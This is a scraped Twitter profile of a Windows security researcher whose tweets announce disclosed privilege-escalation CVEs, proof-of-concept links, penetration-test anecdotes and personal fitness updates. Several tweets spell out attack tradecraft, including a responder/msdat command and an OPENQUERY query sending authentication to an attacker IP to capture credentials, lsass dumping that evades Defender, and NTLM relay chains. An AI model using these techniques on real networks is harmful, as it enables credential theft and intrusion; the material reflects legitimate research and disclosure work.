Filip Dragovic @filip_dragovic Twitter profile

Last Seen Profiles

@MasjidAnnurMpls

@Gia_anastasia67

@loperwrestling

@__lichtenstein

@marei_de_pon

@JFilament

@Regnjun

@riadaht

@Dawgcoin_erc20

@stw_pdg

@tuggerzz

@tr4nsluna

@koudai_unmask

@Imperium_No_112

@lunatricxxx

@Kenzou_yabe

@PashaButorin

@DawnsMission

@SacBIRMINGHAM

@stw_pdg

@AnalisaCRVG

@djokeerydaily

@_thebeatonpath

@yuao72

@laurentKarila

@ChloePussy96

@verylonganimals

@ManCityWomen

@BIPOCracism

@nadine_feiler

@mett_real

@coco_natsune

@LNFOURS

@mordekoiso

@AllisonOneacre

@koleksiceldam

Filip Dragovic

@filip_dragovic

2 years

Spooler service disabled, RPC filters installed to prevent PetitPotam and File Server VSS Agent Service not installed but you still want to relay DC authentication to ADCS? Don't worry MS-DFSNM have your back ;)

32

533

1K

Filip Dragovic

@filip_dragovic

2 years

One funny way to use procdump to dump lsass and not get flagged by defender is to redirect it to smb share where only current user can authenticate (you can use dummy user with runas /netonly). Defender will not be able to scan dump file and will not flag it.

9

132

471

Filip Dragovic

@filip_dragovic

2 months

So MSRC first say that they cannot reproduce ,now say that no security boundary is crossed. Tested this on few different machines and it was successful on all of them. This is bug in GamingServices , non default service so impact is not high.

17

115

421

Filip Dragovic

@filip_dragovic

4 months

You can find PoC here

GitHub - Wh04m1001/CVE-2024-20656

Contribute to Wh04m1001/CVE-2024-20656 development by creating an account on GitHub.

github.com

MDSec

@MDSecLabs

4 months

Exploiting CVE-2024-20656, a Local Privilege Escalation in the VSStandardCollectorService150 Service - new research from @filip_dragovic

2

119

354

9

129

400

Filip Dragovic

@filip_dragovic

1 year

One of paths to DA in current engagement. Run gowitneess and take screenshot of servers in scope. Identified Cisco Unified Call Manager on one of the servers. Used SeeYouCM Thief to enumerate AD users. Used kerbute to spray password and get one hit. 1/n

15

77

358

Filip Dragovic

@filip_dragovic

1 year

Here is PoC for CVE-2022-41120 . I combined arb file delete and limited arb file write to get code execution as NT Authority\System.

GitHub - Wh04m1001/SysmonEoP

Contribute to Wh04m1001/SysmonEoP development by creating an account on GitHub.

github.com

4

134

343

Filip Dragovic

@filip_dragovic

2 years

Just another AV utility that can be used to dump process memory. :)

3

99

310

Filip Dragovic

@filip_dragovic

9 months

Here is PoC for LPE in Windows Error Reporting Service CVE-2023-36874

GitHub - Wh04m1001/CVE-2023-36874

Contribute to Wh04m1001/CVE-2023-36874 development by creating an account on GitHub.

github.com

8

134

307

Filip Dragovic

@filip_dragovic

2 years

As ZoneAlarm decided to not fix LPE vulnerability in their software I am releasing PoC

11

95

290

Filip Dragovic

@filip_dragovic

1 year

Here is PoC for CVE-2023-21752. Arbitrary file delete in Windows Backup service.

GitHub - Wh04m1001/CVE-2023-21752

Contribute to Wh04m1001/CVE-2023-21752 development by creating an account on GitHub.

github.com

8

104

293

Filip Dragovic

@filip_dragovic

27 days

I published my PoC for CVE-2023-36047 as MSRC fixed the bypass today tracked as CVE-2024-21447. With some modification can be ported for CVE-2024-21447.

GitHub - Wh04m1001/UserManagerEoP

Contribute to Wh04m1001/UserManagerEoP development by creating an account on GitHub.

github.com

2

96

256

Filip Dragovic

@filip_dragovic

2 months

So apparently MSRC now thinks this is a valid issue 🤔 Lmao

Filip Dragovic

@filip_dragovic

2 months

So MSRC first say that they cannot reproduce ,now say that no security boundary is crossed. Tested this on few different machines and it was successful on all of them. This is bug in GamingServices , non default service so impact is not high.

17

115

421

19

35

236

Filip Dragovic

@filip_dragovic

4 months

First CVE in 2024 :) This was arbitrary file DACL reset vulnerability with a little twist and thats that file permissions where copied from parent folder which prevented me from using the usual suspects (PrintConfig.dll etc) during the exploitation.

11

41

230

Filip Dragovic

@filip_dragovic

5 years

Have a valid creds for mssql db and xp_dirtree is enabled? Use msdat and responder to capture netntlm hashes 1: responder -I eth0 -v 2: ./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --capture $MY_IP_ADDRESS --share-name $SHARE #infosec #hacking

6

105

228

Filip Dragovic

@filip_dragovic

2 years

Here is small code to dump SAM/SYSTEM/SECURITY hives from remote host when you have SeBackup/SeRestore privileges (Backup Operators) : . Files will be saved on remote host but backup operators can access c$ and download it.

2

87

224

Filip Dragovic

@filip_dragovic

2 years

Just another way to abuse SeImpersonate privilege... Hard work is done by crisprss (dont know twitter handle) , i simply found way to weaponize it. :)

GitHub - Wh04m1001/DiagTrackEoP

Contribute to Wh04m1001/DiagTrackEoP development by creating an account on GitHub.

github.com

4

94

220

Filip Dragovic

@filip_dragovic

11 months

Here is my PoC for CVE-2023-29343/Arbitrary File Write in Sysmon v14.14 which was fixed about 2 months ago.

GitHub - Wh04m1001/CVE-2023-29343

Contribute to Wh04m1001/CVE-2023-29343 development by creating an account on GitHub.

github.com

1

69

212

Filip Dragovic

@filip_dragovic

1 year

I reported bypass for a lame patch in Sysmon. MSRC confirms the bypass, they release new sysmon version that apparently fixes the bug. And this is response I get for asking if they will give cve as I didn't get any notification from them that they fixed bug.

19

18

209

Filip Dragovic

@filip_dragovic

1 year

Another way to abuse SeImpersonate privilege. This time using RasMan service.

GitHub - crisprss/RasmanPotato: Abuse Impersonate Privilege from Service to SYSTEM like other...

Abuse Impersonate Privilege from Service to SYSTEM like other potatoes do - crisprss/RasmanPotato

github.com

0

73

201

Filip Dragovic

@filip_dragovic

2 years

CVE-2022-26923 when you have SYSTEM on server/workstation. credits: @ly4k_

CVE-2022–26923.ps1

GitHub Gist: instantly share code, notes, and snippets.

gist.github.com

3

65

200

Filip Dragovic

@filip_dragovic

11 months

Here is my PoC for CVE-2023-20178 / Arbitrary File Delete vulnerability in Cisco Secure Client and Cisco AnyConnect which was fixed earlier this month.

GitHub - Wh04m1001/CVE-2023-20178

Contribute to Wh04m1001/CVE-2023-20178 development by creating an account on GitHub.

github.com

2

62

195

Filip Dragovic

@filip_dragovic

1 year

First bug that I reported to MSRC :)

17

16

179

Filip Dragovic

@filip_dragovic

2 years

TIL: If you have GenericAll right's on AD Container ,in this case Program Data (i assume it works on others too), you can add new computer/user objects even if you are not DA/SemachineAccountPrivilege is disabled.

7

48

167

Filip Dragovic

@filip_dragovic

5 years

Successfully passed #OSCP exam!! Thanks @offsectraining for this great experience! Also big thanks to @EricaZeli and @fasthm00 for supporting me from beginning <3 <3. #PWK #offsec

13

11

159

Filip Dragovic

@filip_dragovic

2 months

14 months later 50kg/110lbs lost 🥳 Last year in January was 155kg/341lbs, currently at 104.8/230lbs

Filip Dragovic

@filip_dragovic

11 months

I started doing light exercises/eating healthier and in 5 months lost around 22kg/48lbs. 7 more months to lose another 23kg/50lbs 🙂

6

0

59

18

0

152

Filip Dragovic

@filip_dragovic

11 days

Short blog post for EoP in virtualbox

MDSec

@MDSecLabs

11 days

New post on the blog… Exploiting CVE-2024-21111 : Local Privilege Escalation in Oracle VirtualBox by @filip_dragovic

2

87

216

0

32

129

Filip Dragovic

@filip_dragovic

3 years

Finished #APTLabs from @hackthebox_eu . Best lab i played so far! Really enjoyed it, great work @cube0x0 !!!

12

6

124

Filip Dragovic

@filip_dragovic

1 year

PoC for arbitrary file delete/move in #Razer Macro module that is not fixed as their bug hunting team do not consider this a bug but an exploit 🙃.

GitHub - Wh04m1001/RazerEoP

Contribute to Wh04m1001/RazerEoP development by creating an account on GitHub.

github.com

7

46

121

Filip Dragovic

@filip_dragovic

2 years

PoC for CVE-2022-3368 , arbitrary file move bug I found in Avira Security.

GitHub - Wh04m1001/CVE-2022-3368

Contribute to Wh04m1001/CVE-2022-3368 development by creating an account on GitHub.

github.com

0

37

121

Filip Dragovic

@filip_dragovic

1 year

For those intrested in details about Sysmon vulnerability, at the moment i cannot share any details as fix implemented by MSRC is pretty lazy and vulnerability still exists and MSRC have been notified about bypass

Filip Dragovic

@filip_dragovic

1 year

First bug that I reported to MSRC :)

17

16

179

4

23

120

Filip Dragovic

@filip_dragovic

10 months

Yay, I was awarded a $6,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder

14

2

113

Filip Dragovic

@filip_dragovic

3 months

When you delete VM with your PoC that you forgot to backup

6

7

104

Filip Dragovic

@filip_dragovic

5 years

Thanks @offsectraining , 😊

12

4

101

Filip Dragovic

@filip_dragovic

3 years

Can trigger authentication on DC without credentials with Petitpotam but there is no ADCS? Relay to smb on other hosts with socks option in ntlmrelayx and use printnightmare through relayed connection and trigger it without having any credentials 🙃

4

28

99

Filip Dragovic

@filip_dragovic

1 year

Decided to go with OSED in 2023. This is gonna be fun!

9

2

95

Filip Dragovic

@filip_dragovic

3 years

Thank you @offsectraining #osep #offsec

13

2

86

Filip Dragovic

@filip_dragovic

11 months

Fourth LPE in 8 days 🙃

6

1

81

Filip Dragovic

@filip_dragovic

11 months

And 12th vuln in microsoft confirmed :)

3

1

79

Filip Dragovic

@filip_dragovic

5 years

Big thanks to @mrb3n813 , @_RastaMouse and @hackthebox_eu for such great experience!!! #offshore #rastalabs #HTB

6

76

Filip Dragovic

@filip_dragovic

1 year

MSRC corrected this. Thank you @msftsecresponse !

Filip Dragovic

@filip_dragovic

1 year

I reported bypass for a lame patch in Sysmon. MSRC confirms the bypass, they release new sysmon version that apparently fixes the bug. And this is response I get for asking if they will give cve as I didn't get any notification from them that they fixed bug.

19

18

209

11

2

78

Filip Dragovic

@filip_dragovic

11 months

Cisco fixed a vulnerability I found a couple of months ago.

Cisco Security Advisory: Cisco AnyConnect Secure Mobility Client Software for Windows and Cisco...

A vulnerability in the client update process of Cisco AnyConnect Secure Mobility Client Software for Windows and Cisco Secure Client Software for Windows could allow a low-privileged, authenticated,...

sec.cloudapps.cisco.com

9

14

78

Filip Dragovic

@filip_dragovic

2 years

Exploit for vulnerability I found in CheckPoint ZoneAlarm that was fixed last month:

GitHub - Wh04m1001/ZoneAlarmEoP: Exploit for Arbitrary File Move vulnerability in ZoneAlarm AV

Exploit for Arbitrary File Move vulnerability in ZoneAlarm AV - GitHub - Wh04m1001/ZoneAlarmEoP: Exploit for Arbitrary File Move vulnerability in ZoneAlarm AV

github.com

0

31

76

Filip Dragovic

@filip_dragovic

10 months

Last year I decided to find some bugs in Microsoft products and I am happy that I was able to get on MSRC MVR list for 2023 🥳

8

0

74

Filip Dragovic

@filip_dragovic

5 months

11 months in and 101lbs/46kg lost :)

Filip Dragovic

@filip_dragovic

11 months

I started doing light exercises/eating healthier and in 5 months lost around 22kg/48lbs. 7 more months to lose another 23kg/50lbs 🙂

6

0

59

11

1

73

Filip Dragovic

@filip_dragovic

10 months

Another LPE :D Am glad I didn't give up on this bug yesterday when I was 90% sure it wasn't exploitable :))

3

0

67

Filip Dragovic

@filip_dragovic

10 months

Six months in 27kg/59.5lbs down 🎉

Filip Dragovic

@filip_dragovic

11 months

I started doing light exercises/eating healthier and in 5 months lost around 22kg/48lbs. 7 more months to lose another 23kg/50lbs 🙂

6

0

59

8

1

65

Filip Dragovic

@filip_dragovic

1 year

Both of these have been accepted and my goal to find 10+ bugs in Microsoft in one year is now completed :)

Filip Dragovic

@filip_dragovic

1 year

It's 4:30 AM and I have submitted second vulnerability report to MSRC for today. Hopefully they will get accepted :). Now time for some sleep :D

2

1

56

3

2

65

Filip Dragovic

@filip_dragovic

2 months

This is fixed now

Filip Dragovic

@filip_dragovic

2 months

So apparently MSRC now thinks this is a valid issue 🤔 Lmao

19

35

236

4

3

63

Filip Dragovic

@filip_dragovic

9 months

Eset fixed a vulnerability I found a couple of months ago. This was arbitrary folder content delete bug, which I was able to turn in arbitrary file move and gain system shell.

1

5

61

Filip Dragovic

@filip_dragovic

3 months

Another LPE report submitted and now its time to sleep :D

4

0

60

Filip Dragovic

@filip_dragovic

4 years

Thank you @SecurityTube and @nikhil_mitt for very interesting and fun lab and exam!!!

4

3

58

Filip Dragovic

@filip_dragovic

11 months

I started doing light exercises/eating healthier and in 5 months lost around 22kg/48lbs. 7 more months to lose another 23kg/50lbs 🙂

6

0

59

Filip Dragovic

@filip_dragovic

3 months

It seems this will be publicly disclosed very soon :D

Filip Dragovic

@filip_dragovic

3 months

Another LPE report submitted and now its time to sleep :D

4

0

60

6

2

57

Filip Dragovic

@filip_dragovic

1 year

It's 4:30 AM and I have submitted second vulnerability report to MSRC for today. Hopefully they will get accepted :). Now time for some sleep :D

2

1

56

Filip Dragovic

@filip_dragovic

6 months

Looks like microsoft killed the abuse of arbitrary folder creation using SxS assembly trick. Tested wermgr.exe/narrator.exe/werfault.exe and some of my own that were not public and they will not try to open .local directory on fully update win10/win11. :(

2

9

55

Filip Dragovic

@filip_dragovic

7 months

This was arbitrary file create bug that lead elevation of privilege.

ZDI-23-1493

G DATA Total Security GDBackupSvc Service Link Following Local Privilege Escalation Vulnerability

www.zerodayinitiative.com

3

5

53

Filip Dragovic

@filip_dragovic

3 months

I have feeling that people at microsoft make Azure more complicated on purpose. Like wtf is this shit 🤬

7

2

51

Filip Dragovic

@filip_dragovic

1 year

Today it took more time to setup VPN then getting DA xD

5

4

50

Filip Dragovic

@filip_dragovic

7 days

@a66ot Not 0day tho Vulnerability found by both @mansk1es and me

CVE-2024-21111 - Local Privilege Escalation in Oracle VirtualBox - MDSec

VirtualBox is a popular open source, cross-platform, virtualization software developed by Oracle Corporation. Earlier this year we identified an arbitrary file move vulnerability in the VirtualBox...

www.mdsec.co.uk

2

14

73

Filip Dragovic

@filip_dragovic

1 year

I was able to leak credentials of user configured for linked server using following query SELECT * FROM OPENQUERY(linkedserver, 'SELECT sAMAccountName FROM ''LDAP://<kali ip>/DC=somedomain,DC=local'''). 3/n

3

1

47

Filip Dragovic

@filip_dragovic

2 years

Yeah KrbrelayUp is nice automation tool but Krbrelay framework is released 2.5+ months ago and everyone reacts like never saw this before.

2

45

Filip Dragovic

@filip_dragovic

9 months

Congratulations to all researchers! This is the first time for me to be on MSRC MVR list ( #38 overall).

Security Response

@msftsecresponse

9 months

Congratulations to our MSRC 2023 Most Valuable Researchers! Thank you to all the researchers who have helped secure our customers. 👏🎉 Check out our blog for the full list:

3

25

101

5

1

44

Filip Dragovic

@filip_dragovic

2 years

Anyone have idea why its possible to relay to yourself when using KrbRelay? I am on DC and relayed auth to same DC on ldap service. This should not work right? or relay to same host is only restricted for NTLM ?

1

6

43

Filip Dragovic

@filip_dragovic

6 years

WOW time fly's fast its been over a year how i joined @hackthebox_eu !! BIG THANX to @hackthebox_eu team for this priceless experience

1

3

42

Filip Dragovic

@filip_dragovic

5 months

Thanks @msftsecresponse for great swag!

4

0

42

Filip Dragovic

@filip_dragovic

3 months

Nice work! 🔥

s1zz

@s1zzzz

3 months

Discovered and exploited an arbitrary file delete vulnerability that lead to SYSTEM level privileges. Thanks to the goat @filip_dragovic .

8

30

173

0

3

38

Filip Dragovic

@filip_dragovic

1 year

@DebugPrivilege Compromised user that could set RBCD on DC but all domain admins where in protected users group so I impersonated DC itself and did a DCSync :)

3

1

41

Filip Dragovic

@filip_dragovic

8 months

When you see CVE for bug you failed to exploit

2

41

Filip Dragovic

@filip_dragovic

11 months

Autodesk fixed vulnerability i have found a few months ago

ZDI-23-712

Autodesk On-Demand Install Services Link Following Local Privilege Escalation Vulnerability

www.zerodayinitiative.com

2

4

40

Filip Dragovic

@filip_dragovic

7 months

Do people really buyUAC bypasses?? LOL

Dark Web Intelligence

@DailyDarkWeb

7 months

A threat actor claims to be selling a UAC bypass exploit It works on all Windows 10/Server. Price: $5000 #DarkWeb #exploit

3

9

44

8

0

39

Filip Dragovic

@filip_dragovic

1 year

Dumping LSA Secrets from compromised hosts resulted in clear text credentials of service account that is member of Domain Admin group \o/ 5/5

0

1

39

Filip Dragovic

@filip_dragovic

14 days

This was fun bug. Tomorrow will post short blog post about it.

MANSK1ES

@mansk1es

14 days

Oracle VirtualBox Prior 7.0.16 LPE Exploit Finding this bug was very cool :)

6

63

195

0

4

37

Filip Dragovic

@filip_dragovic

8 months

When you find EoP bug but you are too lazy to write exploit and report.

3

0

37

Filip Dragovic

@filip_dragovic

9 months

This one was fun. Hopefully I will make blog post on how I discovered and exploited this vulnerability to gain system privileges

2

0

37

Filip Dragovic

@filip_dragovic

3 months

Me: submit report with PoC and poc video how to do everything. Triage: (Do the opposite of what i showed in video) Can't reproduce FFS how these people get their jobs

3

1

34

Filip Dragovic

@filip_dragovic

7 months

Had a really great time on #redtreat23 , thanks to @domchell @StanHacked @MarcOverIP for organizing this event!

0

34

Filip Dragovic

@filip_dragovic

4 years

Awesome course, recommend everyone who wants to get started in Active Directories

Pentester Academy

@SecurityTube

4 years

Congratulations to @filip_dragovic for clearing our Certified Red Team Professional exam! #ADLab #CRTP cc @nikhil_mitt

2

1

12

2

4

31

Filip Dragovic

@filip_dragovic

5 months

🤣🤣🤣🤣🤣🤣🤣🤣

0

5

32

Filip Dragovic

@filip_dragovic

10 months

This quarter finished with 4 valid reports and 100pts. Congratulations to all other researchers!

Security Response

@msftsecresponse

10 months

Congratulations to all the researchers recognized in this quarter’s MSRC 2023 Q2 Security Researcher Leaderboard! For more information, check out our blog post: #cybersecurity #securityresearch #msrc

3

10

42

1

0

33

Filip Dragovic

@filip_dragovic

1 year

Useful blog posts @n00py1 @DevinCasadey 🙏🙏

More Active Directory Enumeration via MSSQL

In my previous blog post, RID bruteforcing was used to uncover a full list of Active Directory users via MSSQL injection. However, if the right circumstances are present, this can be a lot easier...

keramas.github.io

Filip Dragovic

@filip_dragovic

1 year

One of paths to DA in current engagement. Run gowitneess and take screenshot of servers in scope. Identified Cisco Unified Call Manager on one of the servers. Used SeeYouCM Thief to enumerate AD users. Used kerbute to spray password and get one hit. 1/n

15

77

358

0

6

32

Filip Dragovic

@filip_dragovic

7 months

@mpgn_x64 i didnt research fully this but it may be possible to read laps passwords too (if you can relay and can do SC/RBCD)

GitHub - simondotsh/DirSync: DirSync is a simple proof of concept PowerShell module to demonstrate...

DirSync is a simple proof of concept PowerShell module to demonstrate the impact of delegating DS-Replication-Get-Changes and DS-Replication-Get-Changes-In-Filtered-Set. - simondotsh/DirSync

github.com

1

5

31

Filip Dragovic

@filip_dragovic

1 year

Seems that HTB now only release new ProLabs on their business platform 🙄. Two years no new ProLabs on main platform.

8

0

30

Filip Dragovic

@filip_dragovic

1 year

When you can't sleep and realize you could have DA two days ago but you a fking idiot 🤬🤬🤬

7

2

30

Filip Dragovic

@filip_dragovic

6 months

This one is not EoP out of the box but in certain conditions it can be xD

1

2

29

Filip Dragovic

@filip_dragovic

1 month

When i will learn to not test stuff on my personal machine. I really know how to shoot myself in the foot

5

0

27

Filip Dragovic

@filip_dragovic

6 years

Finished with #TempleofDoom !!! Thanx to @0katz for making this VM!!! #Boot2root #CTF #OSCP

1

6

29

Filip Dragovic

@filip_dragovic

9 months

@domchell @MDSecLabs @exploitph Thank you Dom, very excited to join the team :)

5

0

29

Filip Dragovic

@filip_dragovic

9 days

This is gonna be fun! See you there :)

/ˈziːf-kɒn/

@x33fcon

12 days

🎉 Exciting news! 🎉 The agenda for #x33fcon has just been announced! 📢 Don't miss out on insightful #talks , engaging #workshops , and #networking opportunities. Who's presenting this year? Check it out: #cybersecurity #conference #workshops #training

0

15

44

2

1

29

Filip Dragovic

@filip_dragovic

2 months

What to do when MSRC fails to reproduce bug that successfully confirmed on multiple laptops and they closed 2 cases i opened ??

13

3

29

Filip Dragovic

@filip_dragovic

2 months

ffs

3

1

26

Filip Dragovic

@filip_dragovic

1 year

And got DA yayaya!

Filip Dragovic

@filip_dragovic

1 year

When you can't sleep and realize you could have DA two days ago but you a fking idiot 🤬🤬🤬

7

2

30

3

0

26

Filip Dragovic

@filip_dragovic

2 months

@0gtweet One of the easiest is to change imagepath of seclogon service, its by default started on demand and can be started by low privilege user

1

26

Filip Dragovic

@filip_dragovic

9 months

Feels good to be able to bench more (slightly more) than my current body weight 😊. The last time I was able to do that was almost 4 years ago. Now it's time to chase old PB's and set some new ones!

0

25

Filip Dragovic

@filip_dragovic

8 months

Today was chest day. Incline bench: 5x5 225lbs Incline chest press machine: 3x8 225lbs Pec fly: 3x10-12 170lbs Dips: 3x8 (bw 266) Triceps pushdown: 3x10 150lbs Triceps ext: 3x90 lbs Almost 8 months of caloric defict and around 74lbs lost. Hopefully, will hit 15% bf in 4-6 months

8

0

24

Filip Dragovic

@filip_dragovic

11 months

If its only takes ~1h to find EoP due to shitty bloatware do you really need a bug in windows to get to SYSTEM lol

1

2

25

Filip Dragovic

@filip_dragovic

3 years

@n00py1 I think that smbpasswd can also be used for this

1

0

25

Filip Dragovic

@filip_dragovic

6 years

Finished #MinUv1 from @vulnhub !!! #Boot2Root #VM

0

2

22

Filip Dragovic

@filip_dragovic

1 year

Used obtained credentials to try to authenticate on available MSSQL servers. Got few successful logins. On one of SQL servers had few linked servers configured , few of them where using ADSDSOObject provider (for integration with AD). 2/n

2

0

24

Filip Dragovic

@filip_dragovic

5 years

Finished #CasinoRoyale from @VulnHub !! Thanx to @_creosote and @VulnHub for creating and hosting this VM!! #vm #boot2root #ctf #infosec #hacking #oscp